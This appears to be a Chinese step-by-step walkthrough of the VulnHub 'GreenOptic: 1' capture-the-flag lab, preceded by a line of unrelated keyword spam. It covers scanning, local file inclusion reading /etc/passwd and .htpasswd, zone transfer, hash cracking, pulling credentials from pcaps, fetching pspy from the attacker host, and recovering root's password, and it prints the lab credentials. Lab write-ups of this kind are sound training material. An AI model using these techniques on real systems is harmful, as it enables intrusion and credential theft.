58上怎么做装修网站,ui做标注的网站,网站开发英文参考文献,门户网站注意事项一、准备工作
kali和靶机都选择NAT模式#xff08;kali与靶机同网段#xff09;
1.靶场环境
下载链接:GreenOptic: 1 ~ VulnHub
2.kali的ip 命令:ifconfig 3.靶机的ip
扫描靶机ip sudo arp-scan -l 二、信息收集
1.nmap的信息收集
#xff08;1#xff09;扫描靶机开…一、准备工作
kali和靶机都选择NAT模式kali与靶机同网段
1.靶场环境
下载链接:GreenOptic: 1 ~ VulnHub
2.kali的ip 命令:ifconfig 3.靶机的ip
扫描靶机ip sudo arp-scan -l 二、信息收集
1.nmap的信息收集
1扫描靶机开放的端口及其服务 nmap -A -sV 192.168.101.123 2.网站的信息收集
1靶机开放了80端口,先访问靶机网站看看有什么有用的信息 貌似没有什么信息
2靶机开放了10000端口,在浏览器中查看一下是否存在有用的信息 发现可能是dns域名解析的问题访问不到http://192.168.101.123:1000,在/etc/hosts文件添加如下信息
192.168.101.123 websrv01.greenoptic.vm 修改完成后,点击刚才页面提示的那个网站 随即进入到登录界面 暂时不知账号密码先放一放
3dirb扫描网站的登录界面 dirb http://192.168.101.123 浏览器登录http://192.168.101.123/account,发现了一个登录界面 虽然没有账号密码登录但是发现了url可能存在文件包含
http://192.168.101.123/account/index.php?include/etc/passwd 如上图所示创建一个文件将这些用户名收集起来,将筛选出来的用户放到username里面 vim user cat user | grep /bin/bash vim username dnsenum --dnsserver 192.168.101.123 --enum greenoptic.vm 4找到了另一个域名设置hosts后访问。发现需要账号密码 dig 192.168.101.123 greenoptic.vm axfr 在/etc/hosts 添加recoveryplan.greenoptic.vm域名 5发现一个加密的密码
在view-source:http://192.168.101.123/account/index.php?include/var/www/.htpasswd一个密码 staff:$apr1$YQNFpPkc$rhUZOxRE55Nkl4EDn.1Po. 6用john进行md5解密 cp password password.dc john --wordlist/usr/share/wordlists/rockyou.txt password.dc 7成功登录http://recoveryplan.greenoptic.vm/
用刚才获取到用户密码登录http://recoveryplan.greenoptic.vm/ 进入到key information 按照提示利用本地文件包含去读terry-/var/mail/terry和sam-/var/mail/sam的邮件同时下载dpi.zip。 下载好dpi.zip后解压它 cd /下载 unzip dpi.zip 发现解压时需要密码提示说以邮件形式发送
查看邮件 view-source:http://192.168.101.123/account/index.php?include/var/mail/sam 利用HelloSunshine123密码解压得出dpi.pcap文件 7wireshark流量分析
使用wireshark对dpi.pcap文件进行流量分析 wireshark 1.选择要分析的文件
2.分析
点击统计里面的conversation tcp流量是当中最多的可能存在信息 3.找到一组账号密码 alex:FwejAASD1 利用刚才得到用户密码ssh远程登录 ssh alex192.168.101.123 3.获取shell 三、漏洞的发现与利用 1.pspy64s监听进程
1下载好pspy64s工具到/var/www/html下面 cd /var/www/html wget https://github.com/DominicBreuker/pspy/releases/download/v1.2.0/pspy64s 将pspy64s工具下载到靶机上
2在kali开启一个Http服务 python -m SimpleHTTPServer 3远程用户alex下载pspy64s工具 wget 192.168.101.10:8000/pspy64s 4提升pspy64s权限 chmod 777 pspy64s ls -l 5启动pspy64s查看进程寻找可以利用的漏洞 ./pspy64s 2.通过流量包分析
用户alex文件夹下有一个wireshark文件夹同时还发现alex属于wireshark用户组 ls -all cat /etc/group|grep wireshark 使用dumpcap抓取本地环回地址包一段时间下载到本地使用wireshark解析。 dumpcap -w test.pcap -i lo 一段时间后ctrlc退出 将流量包下载到kali上
在靶机 cp test.pcap /tmp/ 在kali scp alex192.168.101.123:/tmp/test.pcap ./ wireshark 发现有Auth包base64解码得到了root用户口令ASfojoj2eozxczzmedlmedASASDKoj3o 拿下flag cd /root cat root.txt